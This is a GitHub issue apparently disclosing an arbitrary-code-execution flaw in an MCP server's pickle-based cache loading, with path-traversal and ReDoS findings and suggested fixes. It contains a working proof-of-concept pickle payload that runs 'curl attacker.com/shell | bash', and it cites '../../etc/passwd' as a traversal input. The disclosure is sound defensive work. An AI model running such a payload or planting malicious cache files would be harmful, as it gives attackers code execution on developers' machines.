Skip to content

Security: pickle.load() without integrity check enables arbitrary code execution #4

@Mibayy

Description

@Mibayy

Summary

The cache loading in server.py uses pickle.load() to deserialize .codebase-index-cache.pkl before any validation. Since pickle.load() executes arbitrary code at deserialization time, the isinstance() checks that follow offer zero protection.

Vulnerable code

# server.py lines ~183-201
def _load_cache(project_root: str) -> "ProjectIndex | None":
    path = _cache_path(project_root)
    if not os.path.exists(path):
        return None
    try:
        with open(path, "rb") as f:
            payload = pickle.load(f)   # <-- code executes HERE
        if not isinstance(payload, dict) or payload.get("version") != _CACHE_VERSION:
            return None
        index = payload["index"]
        if not isinstance(index, PI):
            return None
        return index

Attack vector

Any process with write access to the project directory can plant a malicious .codebase-index-cache.pkl:

import pickle, os

class Exploit:
    def __reduce__(self):
        return (os.system, ("curl attacker.com/shell | bash",))

with open(".codebase-index-cache.pkl", "wb") as f:
    pickle.dump({"version": 1, "index": Exploit()}, f)

On the next MCP server start (or first tool call), _ensure_index() -> _load_cache() runs the payload with the privileges of the MCP server process.

A malicious actor could also commit the file to a public repo — any developer who clones it and starts the MCP server would be exploited silently.

Suggested fix

Option A — Replace pickle with JSON (recommended): Serialize only the structural metadata (dicts, lists, strings, ints). Eliminates the attack surface entirely.

Option B — SafeUnpickler with allowlist:

import pickle

_SAFE_MODULES = {"mcp_codebase_index.models", "mcp_codebase_index.project_indexer"}

class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module not in _SAFE_MODULES:
            raise pickle.UnpicklingError(f"Blocked: {module}.{name}")
        return super().find_class(module, name)

payload = SafeUnpickler(f).load()

Additional findings from the same audit

  • ReDoS in search_codebase (query_api.py): user-supplied regex applied to every line with no timeout. Mitigation: regex library with timeout=2.0 or signal.alarm.
  • Path traversal in reindex_file (project_indexer.py ~L186): ../../etc/passwd not validated against root. Fix: if rel_path.startswith(".."): raise ValueError.
  • Ambiguous endswith matching in _resolve_file (query_api.py ~L233): can return unintended files.

Environment

Discovered during a local security audit before production deployment. Cache files added to .gitignore as interim mitigation. Happy to submit a PR.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions